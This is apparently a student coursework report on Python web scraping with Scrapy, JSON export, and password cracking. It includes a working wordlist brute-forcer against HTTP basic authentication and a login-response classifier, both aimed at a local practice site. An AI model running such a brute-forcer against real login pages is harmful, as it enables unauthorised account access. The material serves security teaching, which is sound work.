
Day-Month

2019

Quotes

Student names:

HIGHER COLLEGES OF TECHNOLOGY



Table of Contents

1. INTRODUCTION

1.1. OBJECTIVES OF THE PROJECT

1.2. DELIVERABLES

2. DESIGN A SCRAPER TO SCRAPE INFORMATION FROM A WEBSITE

2.1. CODING A SCRAPER

2.2. TESTING A SCRAPER

3. DESIGN A FORMATTER TO FORMAT OUTPUT DATA IN A JSON FILE

3.1. CODING A FORMATTER

3.2. TESTING A FORMATTER

4. DESIGN A CRACKER TO CRACK A PASSWORD

4.1. CODING TO GENERATE THE COMBINATION OF PASSWORDS

4.2. TESTING PASSWORD GENERATION

4.3. CODING TO CLASSIFY THE GENERATED PASSWORDS

4.4. TESTING PASSWORD CLASSIFICATION

5. REFLECTION

5.1. REFLECTION OF STUDENT1

5.2. REFLECTION OF STUDENT2

5.3. REFLECTION OF STUDENT3

6. REFERENCE PAGE

CSF 2113 201910 1



1. Introduction:
In our first year at HCT we mainly focused on hardware and software; now we are in the
fourth semester and we are taking programming for information security.
Our project is mainly about using Atom, with the help of a website, to scrape different
types of information using Scrapy functions, and it will provide a good interface that can
be shown on the command prompt.
We are going to use Linux Ubuntu to extract information or anything useful to
complete this project. We will start by extracting useful information from a website and
end with cracking passwords.

1.1. Objectives of the Project

Our project has several objectives, and we are working to achieve them, such as
scraping information from the chosen website using several pieces of code, and
cracking, generating, and extracting passwords. We are going to achieve this using
the Anaconda prompt, Atom, our website, and by searching the internet. The special
functions we use and find online may include code of different levels of complexity,
to demonstrate our understanding and to achieve the project's goals.
Finally, our approach is to produce a successful, functional program that is clear and
easy to follow.

1.2. Deliverables

First of all, we expect to create and collect a lot of output from the functions we
use, from scraping to password cracking, with pictures to show that the code is
working properly and to prove that it is our own work:
1. reports
2. pictures
3. notepads with code

2. Design a scraper to scrape information from a website

A scraper is a way to get information from websites: we inspect the elements we need to
scrape or get from the website, then we write the code and save it in a file so the
scraper command can read the code and scrape the information.
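The idea above can be sketched without Scrapy at all. The following is a minimal stdlib-only illustration (the sample HTML is invented, mirroring the structure of quotes.toscrape.com) of pulling text out of the elements we inspected:

```python
from html.parser import HTMLParser

# Minimal sketch: collect the text inside <span class="text"> elements,
# mimicking what the Scrapy XPath selector does on quotes.toscrape.com.
class QuoteParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_quote = False
        self.quotes = []

    def handle_starttag(self, tag, attrs):
        if tag == "span" and ("class", "text") in attrs:
            self.in_quote = True

    def handle_endtag(self, tag):
        if tag == "span":
            self.in_quote = False

    def handle_data(self, data):
        if self.in_quote:
            self.quotes.append(data)

sample = '<div class="quote"><span class="text">Be yourself.</span></div>'
parser = QuoteParser()
parser.feed(sample)
print(parser.quotes)
```

Scrapy does the same walk over the real page, with the XPath expression selecting which nodes to keep.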


2.1. Coding a scraper

from scrapy.spiders import Spider  # BaseSpider is the deprecated old name for scrapy.Spider
from scrapy.selector import Selector

class MySpider(Spider):
    name = "quotes"
    allowed_domains = ['quotes.toscrape.com']
    start_urls = ["http://quotes.toscrape.com/"]

    def parse(self, response):
        hxs = Selector(response)

        # CODE for scraping quote text
        quote = hxs.xpath("//div[@class='quote']/span[@class='text']/text()").extract()
        print(quote)
        for title in quote:
            print(title)

2.2. Testing a scraper


3. Design a formatter to format output data in JSON file

A formatter is a command used to transfer the specified things we scraped in Atom
into a JSON file; this completes our objective, which is displaying the information
we scraped.
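Under the hood, the JSON feed export simply serialises each scraped item as a dictionary and writes the list as a JSON array. A minimal sketch of that step with the standard json module (the sample quotes here are placeholders, not our scraped output):

```python
import json

# Each scraped quote becomes one dictionary; the feed exporter
# writes the whole list of them out as a JSON array.
items = [
    {"quote": "Be yourself; everyone else is already taken."},
    {"quote": "A day without sunshine is like, you know, night."},
]

output = json.dumps(items, indent=2)
print(output)
```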

First, we created a new folder called project2. Then we created a file inside spiders
called alo.py, and we used the same code that we used for the data scraping, but we
added some code and removed some, putting a hashtag in front of the lines we did
not want.

Then we went to the …. and we used a JSON command to save what we scraped in a JSON file
called thyab.json.

All the code and pictures are in part 3.1.


3.1. Coding a formatter

from scrapy.spiders import Spider  # BaseSpider is the deprecated old name for scrapy.Spider
from scrapy.selector import Selector

class MySpider(Spider):
    name = "quotes"
    allowed_domains = ['quotes.toscrape.com']
    start_urls = ["http://quotes.toscrape.com/"]

    def parse(self, response):
        hxs = Selector(response)

        # CODE for scraping quote text
        quote = hxs.xpath("//div[@class='quote']/span[@class='text']/text()").extract()
        print(quote)
        for title in quote:
            print(title)


scrapy crawl quotes2 -o thyab.json -t json


3.2. Testing a formatter


4. Design a cracker to crack a password

We are going to make a cracker that we will use to do a few things, such as generating
passwords and selecting the right one to use for the login. We are going to use the
Scruffy Bank test website, because doing this to any other website would be illegal,
and we are doing it for testing purposes only.

1) First, we checked the authentication method


4.1. Coding to generate the combination of password

import requests
import sys

def banner():
    print("\n***************************************")
    print("*    Basic Password bruteforcer 0.1   *")
    print("***************************************")

def usage():
    print("Usage:")
    print("python bruteforcing-1.1.py targetsite username passwords_file\n")
    print("example: python bruteforcing-1.1.py http://127.0.0.1/Admin admin pass.txt\n")

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 4:
        usage()
        sys.exit()

    args = sys.argv
    # print(args)
    url = args[1]
    username = args[2]
    pwd_file = args[3]

    try:
        f = open(pwd_file, "r")
        passwords = f.readlines()
    except IOError:
        print("Failed opening file: ")
        print(str(pwd_file) + "\n")
        sys.exit()

    for p in passwords:
        # print(p)
        pwd = p.split("\n")[0]
        # print(pwd + " " + url)
        r = requests.get(url, auth=(username, pwd))
        code = r.status_code
        if code == 200:
            print("[+] Password found - " + pwd + " - !!!")
            sys.exit()
        else:
            # print("Not valid " + pwd)
            pass

    print("Password not found !!!")
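The bruteforcer above reads its candidates from a wordlist file. Candidate passwords can also be generated programmatically; a small sketch with itertools (the character set and length are assumptions for illustration, not what the lab used):

```python
import itertools
import string

# Generate every 3-character combination from a small alphabet.
# Real wordlists are far larger; this only illustrates the principle.
charset = string.ascii_lowercase[:4]  # 'abcd'
candidates = ["".join(c) for c in itertools.product(charset, repeat=3)]

print(len(candidates))   # 4**3 = 64 candidate passwords
print(candidates[:3])
```

Each generated string could then be fed to the same requests.get loop in place of a line from the wordlist file.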


4.2. Testing password generation

To extract the admin password, we used this brute-forcing code, which we learned in
one of our labs. It fetches the correct password for the account from a file of
around 600 passwords of varying difficulty and prints it clearly and accurately. We
ran our code against a website called scruffybank.com, and here is our result.
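Since the test run itself was captured in screenshots, its logic can also be simulated offline with a stub standing in for the HTTP request (the wordlist and the "correct" password here are invented for illustration):

```python
# Simulate the brute-force loop without a live server: the stub
# plays the role of requests.get(...).status_code == 200.
def check(username, password):
    return password == "letmein"  # assumed correct password

wordlist = ["123456", "password", "letmein", "qwerty"]

found = None
for pwd in wordlist:
    if check("admin", pwd):
        found = pwd
        break

if found:
    print("[+] Password found - " + found + " - !!!")
else:
    print("Password not found !!!")
```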

4.3. Coding to classify the generated passwords

import requests

payload = {'username': 'admin', 'password': 'administrator123'}
r = requests.post('http://127.0.0.1/check_login.php', data=payload)
print(r.url)

if r.history != []:
    # A redirect happened; use the status code of the first response
    first = r.history[0]
    code = str(first.status_code)
else:
    code = str(r.status_code)

chars = str(len(r.content))

print("Page Output:\t" + chars)
print('Status code:' + '\t[-]' + code + '\n')

4.4. Testing password classification
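The classification in 4.3 relies on the status code and the page length. A small sketch of that decision rule (the redirect convention and the failure-page length are assumptions for illustration, not measured values):

```python
# Classify a login attempt from the response metadata alone:
# a redirect in the history (e.g. 302 to a landing page) or a body
# whose size differs from the known failure page usually signals
# a successful form login.
def classify(status_code, content_length, failed_length=512):
    if status_code == 302:
        return "success"
    if status_code == 200 and content_length != failed_length:
        return "success"
    return "failure"

print(classify(302, 1024))  # redirect after login
print(classify(200, 512))   # same size as the failure page
```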
